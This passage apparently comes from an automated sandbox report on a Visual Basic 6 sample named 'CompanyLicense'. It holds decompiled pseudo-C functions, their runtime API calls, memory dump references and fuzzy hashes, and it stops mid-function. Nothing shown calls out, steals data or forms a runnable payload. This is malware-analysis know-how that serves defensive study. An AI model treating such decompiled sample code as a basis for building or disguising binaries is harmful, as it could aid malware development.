                                      • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 00411993
                                      • #568.MSVBVM60(00000098,?,?,?,00004008,00000001), ref: 004119A8
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119CD
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119D5
                                      • __vbaFreeStr.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119DD
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#568#619ChkstkCopy
                                      • String ID: ABC
                                      • API String ID: 718684173-2743272264
                                      • Opcode ID: baa47468dbc3f9b0507266712fca8a7059b0470f197b01c4a43c2c714149d7c6
                                      • Instruction ID: 289367e65df1a72699b5549ded5959713d7176c195a492a93b176dcb255d4e5a
                                      • Opcode Fuzzy Hash: baa47468dbc3f9b0507266712fca8a7059b0470f197b01c4a43c2c714149d7c6
                                      • Instruction Fuzzy Hash: DF21DB71900248AADB14EFA1C992FDDB7B8BF04704F5080BAB505B71A1EB786A49CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 45%
                                      			E00411005(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v24;
                                      				char _v28;
                                      				intOrPtr _v36;
                                      				char _v44;
                                      				char _v60;
                                      				char _v80;
                                      				intOrPtr* _v84;
                                      				signed int _v88;
                                      				char _v96;
                                      				signed int _v100;
                                      				char* _t41;
                                      				intOrPtr _t48;
                                      				char* _t49;
                                      				char* _t52;
                                      				signed int _t55;
                                      				intOrPtr _t65;
                                      
                                      				_push(0x4012e6);
                                      				_push( *[fs:0x0]);
                                      				 *[fs:0x0] = _t65;
                                      				_push(0x50);
                                      				L004012E0();
                                      				_v12 = _t65;
                                      				_v8 = 0x401228;
                                      				_v36 = 0x80020004;
                                      				_v44 = 0xa;
                                      				_push(0);
                                      				_push(0xffffffff);
                                      				_push( &_v44);
                                      				_push(0x403bdc);
                                      				_push( &_v60);
                                      				L004013BE();
                                      				_t41 =  &_v60;
                                      				_push(_t41);
                                      				_push(0x2008);
                                      				L004013C4();
                                      				_v80 = _t41;
                                      				_push( &_v80);
                                      				_push( &_v24);
                                      				L004013CA();
                                      				_push( &_v60);
                                      				_push( &_v44);
                                      				_push(2);
                                      				L00401400();
                                      				_t48 =  *((intOrPtr*)(_v24 + 0xc));
                                      				_push( *((intOrPtr*)(_t48 + (0 -  *((intOrPtr*)(_v24 + 0x14))) * 4)));
                                      				_push(0x403be8);
                                      				L004013B8();
                                      				if(_t48 != 0) {
                                      					if( *0x413744 != 0) {
                                      						_v96 = 0x413744;
                                      					} else {
                                      						_push(0x413744);
                                      						_push(0x403bc8);
                                      						L0040142A();
                                      						_v96 = 0x413744;
                                      					}
                                      					_t21 =  &_v96; // 0x413744
                                      					_v84 =  *((intOrPtr*)( *_t21));
                                      					_t24 =  &_v28; // 0x413744
                                      					_t52 = _t24;
                                      					L00401460();
                                      					_t55 =  *((intOrPtr*)( *_v84 + 0x10))(_v84, _t52, _t52, _a4);
                                      					asm("fclex");
                                      					_v88 = _t55;
                                      					if(_v88 >= 0) {
                                      						_v100 = _v100 & 0x00000000;
                                      					} else {
                                      						_push(0x10);
                                      						_push(0x403bb8);
                                      						_push(_v84);
                                      						_push(_v88);
                                      						L0040145A();
                                      						_v100 = _t55;
                                      					}
                                      					L0040144E();
                                      				}
                                      				_push(0x411149);
                                      				_t36 =  &_v24; // 0x403be8
                                      				_t49 = _t36;
                                      				_push(_t49);
                                      				_push(0);
                                      				L004013B2();
                                      				return _t49;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411020
                                      • #711.MSVBVM60(?,00403BDC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 00411051
                                      • __vbaAryVar.MSVBVM60(00002008,?,?,00403BDC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 0041105F
                                      • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00403BDC,0000000A,000000FF,00000000), ref: 0041106F
                                      • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00403BDC,0000000A,000000FF,00000000), ref: 0041107E
                                      • __vbaStrCmp.MSVBVM60(00403BE8,?), ref: 0041109C
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00403BE8,?), ref: 004110B8
                                      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004110DC
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000010), ref: 00411105
                                      • __vbaFreeObj.MSVBVM60(00000000,?,00403BB8,00000010), ref: 00411116
                                      • __vbaAryDestruct.MSVBVM60(00000000,;@,00411149,00403BE8,?), ref: 00411143
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#711AddrefCheckChkstkCopyDestructHresultListNew2
                                      • String ID: D7A$D7A;@
                                      • API String ID: 4246334928-2347690085
                                      • Opcode ID: 1e39192127afebf687229e71ae3fd41bb69157881493decb036d74ff224b680d
                                      • Instruction ID: 95d849ccea44ae36ec51817e5fa12a4589028856cd8040deecdf32812a235dcd
                                      • Opcode Fuzzy Hash: 1e39192127afebf687229e71ae3fd41bb69157881493decb036d74ff224b680d
                                      • Instruction Fuzzy Hash: BA310AB1900248AFDB10EFD5C846FDEBBB8EB08705F10416AF601BB1E1D778A644CB29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E004114E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v28;
                                      				void* _v44;
                                      				signed int _v48;
                                      				intOrPtr* _v52;
                                      				signed int _v56;
                                      				intOrPtr _v68;
                                      				char _v72;
                                      				signed int _v76;
                                      				signed int _t36;
                                      				signed int _t42;
                                      				void* _t52;
                                      				void* _t54;
                                      				intOrPtr _t55;
                                      
                                      				_t55 = _t54 - 0xc;
                                      				 *[fs:0x0] = _t55;
                                      				L004012E0();
                                      				_v16 = _t55;
                                      				_v12 = 0x401268;
                                      				_v8 = 0;
                                      				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4012e6, _t52);
                                      				L00401412();
                                      				_push(0x403bf0);
                                      				L0040139A();
                                      				if(_t36 != 1) {
                                      					if( *0x413744 != 0) {
                                      						_v72 = 0x413744;
                                      					} else {
                                      						_push(0x413744);
                                      						_push(0x403bc8);
                                      						L0040142A();
                                      						_v72 = 0x413744;
                                      					}
                                      					_t11 =  &_v72; // 0x413744
                                      					_v52 =  *((intOrPtr*)( *_t11));
                                      					_t42 =  *((intOrPtr*)( *_v52 + 0x48))(_v52, 0x6f,  &_v48);
                                      					asm("fclex");
                                      					_v56 = _t42;
                                      					if(_v56 >= 0) {
                                      						_v76 = _v76 & 0x00000000;
                                      					} else {
                                      						_push(0x48);
                                      						_push(0x403bb8);
                                      						_push(_v52);
                                      						_push(_v56);
                                      						L0040145A();
                                      						_v76 = _t42;
                                      					}
                                      					_t36 = _v48;
                                      					_v68 = _t36;
                                      					_v48 = _v48 & 0x00000000;
                                      					L0040141E();
                                      				}
                                      				_push(0x4115d8);
                                      				L0040140C();
                                      				L0040143C();
                                      				return _t36;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004114FC
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411526
                                      • __vbaI2Str.MSVBVM60(00403BF0,?,?,?,?,004012E6), ref: 00411530
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00403BF0,?,?,?,?,004012E6), ref: 0041154E
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000048), ref: 00411594
                                      • __vbaStrMove.MSVBVM60(00000000,?,00403BB8,00000048), ref: 004115B2
                                      • __vbaFreeStr.MSVBVM60(004115D8,00403BF0,?,?,?,?,004012E6), ref: 004115CA
                                      • __vbaFreeVar.MSVBVM60(004115D8,00403BF0,?,?,?,?,004012E6), ref: 004115D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$CheckChkstkHresultMoveNew2
                                      • String ID: D7A
                                      • API String ID: 640110359-420359484
                                      • Opcode ID: 55d7dc6462d787e5266ac19bcf9c5561194426b32831ac5cf7f5bdb3f732c4f0
                                      • Instruction ID: 9d377c2ca78d9f4a9f33710062ea304e3df86685d521879dc642ea5174df40be
                                      • Opcode Fuzzy Hash: 55d7dc6462d787e5266ac19bcf9c5561194426b32831ac5cf7f5bdb3f732c4f0
                                      • Instruction Fuzzy Hash: 0C210670940208EFCB10EF95C986BDDBBB5EF44709F10802AF505B72B1D7B86A86DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E0040E654(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				intOrPtr _v44;
                                      				intOrPtr _v52;
                                      				intOrPtr _v60;
                                      				intOrPtr _v68;
                                      				char _v72;
                                      				signed int _v76;
                                      				signed int _v84;
                                      				signed int _v88;
                                      				signed int _t50;
                                      				signed int _t62;
                                      				void* _t67;
                                      				void* _t74;
                                      				intOrPtr _t76;
                                      
                                      				_t67 = __edx;
                                      				 *[fs:0x0] = _t76;
                                      				L004012E0();
                                      				_v12 = _t76;
                                      				_v8 = E00401118;
                                      				L00401460();
                                      				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4012e6, __ecx, __ecx, _t74);
                                      				asm("fclex");
                                      				_v76 = _t50;
                                      				if(_v76 >= 0) {
                                      					_v84 = _v84 & 0x00000000;
                                      				} else {
                                      					_push(0x58);
                                      					_push(0x4038e8);
                                      					_push(_a4);
                                      					_push(_v76);
                                      					L0040145A();
                                      					_v84 = _t50;
                                      				}
                                      				_v32 = _v72;
                                      				L00401460();
                                      				L00401454();
                                      				_v28 = E00411D89( &_v36);
                                      				L0040144E();
                                      				_v32 = E00411D89(_v28) + 0x2b0;
                                      				E00411C75(_t67, _v32, _a8);
                                      				_v60 = 0x80020004;
                                      				_v68 = 0xa;
                                      				_v44 = 0x80020004;
                                      				_v52 = 0xa;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
                                      				asm("fclex");
                                      				_v76 = _t62;
                                      				if(_v76 >= 0) {
                                      					_v88 = _v88 & 0x00000000;
                                      				} else {
                                      					_push(0x2b0);
                                      					_push(0x4038e8);
                                      					_push(_a4);
                                      					_push(_v76);
                                      					L0040145A();
                                      					_v88 = _t62;
                                      				}
                                      				_push(0x40e797);
                                      				L0040144E();
                                      				return _t62;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E66F
                                      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0040E688
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,00000058), ref: 0040E6B4
                                      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0040E6CF
                                      • #644.MSVBVM60(?,?,?), ref: 0040E6D8
                                      • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0040E6E9
                                      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E728
                                      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E739
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000002B0), ref: 0040E770
                                      • __vbaFreeObj.MSVBVM60(0040E797), ref: 0040E791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                                      • String ID:
                                      • API String ID: 1032928638-0
                                      • Opcode ID: e48370e53e79ca3f5e71148f94873ef4b7ebe20669c6b30a9aa24f9bf00a22a2
                                      • Instruction ID: dfde1e0ab93940fd952a4a3673299e69c3cb242bcecef37df5d19e9809c2cde3
                                      • Opcode Fuzzy Hash: e48370e53e79ca3f5e71148f94873ef4b7ebe20669c6b30a9aa24f9bf00a22a2
                                      • Instruction Fuzzy Hash: 56413871900208EFDF01EFA1C886BDEBBB5FF04348F10442AF501BB1A1D7B999868B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 57%
                                      			E00411796(void* __ebx, void* __edi, void* __esi, void* _a36, signed int* _a52) {
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v28;
                                      				short _v32;
                                      				void* _v52;
                                      				void* _v56;
                                      				intOrPtr* _v60;
                                      				signed int _v64;
                                      				intOrPtr* _v68;
                                      				signed int _v72;
                                      				char _v84;
                                      				signed int _v88;
                                      				signed int _v92;
                                      				signed int _t46;
                                      				signed int _t51;
                                      				short _t52;
                                      				void* _t62;
                                      				intOrPtr _t63;
                                      
                                      				_t63 = _t62 - 0xc;
                                      				_push(0x4012e6);
                                      				_push( *[fs:0x0]);
                                      				 *[fs:0x0] = _t63;
                                      				_push(0x44);
                                      				L004012E0();
                                      				_v16 = _t63;
                                      				_v12 = 0x401298;
                                      				L004013EE();
                                      				 *_a52 =  *_a52 & 0x00000000;
                                      				if( *0x413744 != 0) {
                                      					_v84 = 0x413744;
                                      				} else {
                                      					_push(0x413744);
                                      					_push(0x403bc8);
                                      					L0040142A();
                                      					_v84 = 0x413744;
                                      				}
                                      				_t8 =  &_v84; // 0x413744
                                      				_v60 =  *((intOrPtr*)( *_t8));
                                      				_t46 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
                                      				asm("fclex");
                                      				_v64 = _t46;
                                      				if(_v64 >= 0) {
                                      					_v88 = _v88 & 0x00000000;
                                      				} else {
                                      					_push(0x14);
                                      					_push(0x403bb8);
                                      					_push(_v60);
                                      					_push(_v64);
                                      					L0040145A();
                                      					_v88 = _t46;
                                      				}
                                      				_v68 = _v52;
                                      				_t51 =  *((intOrPtr*)( *_v68 + 0x118))(_v68,  &_v56);
                                      				asm("fclex");
                                      				_v72 = _t51;
                                      				if(_v72 >= 0) {
                                      					_v92 = _v92 & 0x00000000;
                                      				} else {
                                      					_push(0x118);
                                      					_push(0x403bf4);
                                      					_push(_v68);
                                      					_push(_v72);
                                      					L0040145A();
                                      					_v92 = _t51;
                                      				}
                                      				_t52 = _v56;
                                      				_v32 = _t52;
                                      				L0040144E();
                                      				_push(0x4118b6);
                                      				L0040140C();
                                      				return _t52;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004117B2
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 004117CA
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,?,?,?,?,004012E6), ref: 004117E8
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000014), ref: 0041182C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BF4,00000118), ref: 0041186D
                                      • __vbaFreeObj.MSVBVM60 ref: 00411886
                                      • __vbaFreeStr.MSVBVM60(004118B6), ref: 004118B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
                                      • String ID: D7A
                                      • API String ID: 746201682-420359484
                                      • Opcode ID: 7f21c03fff2b7942bc3479a46f32500b7b470f8e9924f534b3896a954edc29ee
                                      • Instruction ID: 3da20f0e6b97daf0e09974339a0e336b86ea47bf3633eb58ce79b472e72b8b34
                                      • Opcode Fuzzy Hash: 7f21c03fff2b7942bc3479a46f32500b7b470f8e9924f534b3896a954edc29ee
                                      • Instruction Fuzzy Hash: AE31D274900208EFCB00EFD5D986BDDBBB4BF04709F20812AF111BB2A1D7786986DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E00410F23(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v32;
                                      				intOrPtr* _v36;
                                      				signed int _v40;
                                      				intOrPtr* _v48;
                                      				signed int _v52;
                                      				signed int _t21;
                                      				char* _t24;
                                      				intOrPtr _t34;
                                      
                                      				_push(0x4012e6);
                                      				_push( *[fs:0x0]);
                                      				 *[fs:0x0] = _t34;
                                      				_t21 = 0x20;
                                      				L004012E0();
                                      				_v12 = _t34;
                                      				_v8 = 0x401218;
                                      				_push(0);
                                      				_push(1);
                                      				_push(2);
                                      				L004013D0();
                                      				if(_t21 != 0x102) {
                                      					if( *0x413744 != 0) {
                                      						_v48 = 0x413744;
                                      					} else {
                                      						_push(0x413744);
                                      						_push(0x403bc8);
                                      						L0040142A();
                                      						_v48 = 0x413744;
                                      					}
                                      					_v36 =  *_v48;
                                      					_t24 =  &_v32;
                                      					L00401460();
                                      					_t21 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t24, _t24, _a4);
                                      					asm("fclex");
                                      					_v40 = _t21;
                                      					if(_v40 >= 0) {
                                      						_v52 = _v52 & 0x00000000;
                                      					} else {
                                      						_push(0x10);
                                      						_push(0x403bb8);
                                      						_push(_v36);
                                      						_push(_v40);
                                      						L0040145A();
                                      						_v52 = _t21;
                                      					}
                                      					L0040144E();
                                      				}
                                      				asm("wait");
                                      				_push(0x410fea);
                                      				return _t21;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410F3E
                                      • #588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F56
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F75
                                      • __vbaObjSetAddref.MSVBVM60(?,?,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F99
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000010,?,?,?,?,?,?,004012E6), ref: 00410FC2
                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012E6), ref: 00410FD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#588AddrefCheckChkstkFreeHresultNew2
                                      • String ID: D7A
                                      • API String ID: 999118292-420359484
                                      • Opcode ID: 01a679c422231bad8ea73c2104b811225daee1e1c8a65197560c9b6deb36dafa
                                      • Instruction ID: 3187185d973d63851f34d3e6364edd9d147b0b1c8e573a859bc00980647bc6e6
                                      • Opcode Fuzzy Hash: 01a679c422231bad8ea73c2104b811225daee1e1c8a65197560c9b6deb36dafa
                                      • Instruction Fuzzy Hash: 6E11EDB0A50208AFDB109F95C846FDDB7B4EB08B09F10806BF411B61E1D7FD69859B2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E00411A18(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v32;
                                      				short _v36;
                                      				signed int _t15;
                                      				short _t19;
                                      				void* _t26;
                                      				void* _t28;
                                      				intOrPtr _t29;
                                      
                                      				_t29 = _t28 - 0xc;
                                      				 *[fs:0x0] = _t29;
                                      				L004012E0();
                                      				_v16 = _t29;
                                      				_v12 = 0x4012b8;
                                      				_v8 = 0;
                                      				_t15 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t26);
                                      				_push(0x403c1c);
                                      				L00401382();
                                      				L0040141E();
                                      				_push(_t15);
                                      				_push(0x403c28);
                                      				L004013B8();
                                      				asm("sbb eax, eax");
                                      				_v36 =  ~( ~( ~_t15));
                                      				L0040140C();
                                      				_t19 = _v36;
                                      				if(_t19 != 0) {
                                      					_push(L"RESYNTHESIZED");
                                      					L0040137C();
                                      				}
                                      				_push(0x411aae);
                                      				return _t19;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411A34
                                      • #521.MSVBVM60(00403C1C,?,?,?,?,004012E6), ref: 00411A5D
                                      • __vbaStrMove.MSVBVM60(00403C1C,?,?,?,?,004012E6), ref: 00411A67
                                      • __vbaStrCmp.MSVBVM60(00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A72
                                      • __vbaFreeStr.MSVBVM60(00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A86
                                      • #532.MSVBVM60(RESYNTHESIZED,00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#521#532ChkstkFreeMove
                                      • String ID: RESYNTHESIZED
                                      • API String ID: 2085174944-2169086100
                                      • Opcode ID: 17e6767fb07ce83aaf1d68e157f72268f6229ea2235a02ca94614b3019aba531
                                      • Instruction ID: d5b90627d7ac837f56a4303c11ebbad2206acfc21c0c3180c02dd93269833440
                                      • Opcode Fuzzy Hash: 17e6767fb07ce83aaf1d68e157f72268f6229ea2235a02ca94614b3019aba531
                                      • Instruction Fuzzy Hash: 56018F31A40309ABDB00AFA5C842FAE7BA8AF04B44F10817BF505F71E1DA7C99408799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E0041115C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v40;
                                      				char _v44;
                                      				intOrPtr* _v48;
                                      				signed int _v52;
                                      				intOrPtr* _v64;
                                      				signed int _v68;
                                      				char* _t36;
                                      				signed int _t39;
                                      				void* _t50;
                                      				void* _t52;
                                      				intOrPtr _t53;
                                      
                                      				_t53 = _t52 - 0xc;
                                      				 *[fs:0x0] = _t53;
                                      				L004012E0();
                                      				_v16 = _t53;
                                      				_v12 = 0x401238;
                                      				_v8 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t50);
                                      				L00401412();
                                      				if( *0x413010 != 0) {
                                      					_v64 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v64 = 0x413010;
                                      				}
                                      				_t36 =  &_v44;
                                      				L00401430();
                                      				_v48 = _t36;
                                      				_t39 =  *((intOrPtr*)( *_v48 + 0x1bc))(_v48, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x2fc))( *_v64));
                                      				asm("fclex");
                                      				_v52 = _t39;
                                      				if(_v52 >= 0) {
                                      					_v68 = _v68 & 0x00000000;
                                      				} else {
                                      					_push(0x1bc);
                                      					_push(0x403ac4);
                                      					_push(_v48);
                                      					_push(_v52);
                                      					L0040145A();
                                      					_v68 = _t39;
                                      				}
                                      				L0040144E();
                                      				_push(0x411247);
                                      				L0040143C();
                                      				return _t39;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411178
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 004111A2
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,004012E6), ref: 004111BA
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004111E7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000001BC), ref: 00411218
                                      • __vbaFreeObj.MSVBVM60 ref: 00411229
                                      • __vbaFreeVar.MSVBVM60(00411247), ref: 00411241
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$CheckChkstkHresultNew2
                                      • String ID:
                                      • API String ID: 1725699769-0
                                      • Opcode ID: 35640f0ab917591a226f63932e4bb344571b0fc7e0d88eee38d0c25644cba070
                                      • Instruction ID: b7572510e73ec9a1a96d7c45c6eec1d40246c35e3abe97173b01bd1eb91a77cf
                                      • Opcode Fuzzy Hash: 35640f0ab917591a226f63932e4bb344571b0fc7e0d88eee38d0c25644cba070
                                      • Instruction Fuzzy Hash: E821F571A00208AFCB00EFA5D889BDDBBB4BB08708F10846AF501BB2B1C7795945DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E004115F7(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12, void* _a32, signed int* _a60) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				long long* _v16;
                                      				void* _v28;
                                      				char _v44;
                                      				signed int* _t19;
                                      				char* _t22;
                                      				void* _t29;
                                      				void* _t31;
                                      				long long* _t32;
                                      
                                      				_t32 = _t31 - 0xc;
                                      				 *[fs:0x0] = _t32;
                                      				L004012E0();
                                      				_v16 = _t32;
                                      				_v12 = 0x401278;
                                      				_v8 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t29);
                                      				L004013EE();
                                      				_t22 =  &_v44;
                                      				L00401412();
                                      				_t19 = _a60;
                                      				 *_t19 =  *_t19 & 0x00000000;
                                      				asm("fldz");
                                      				_push(_t22);
                                      				_push(_t22);
                                      				 *_t32 = __fp0;
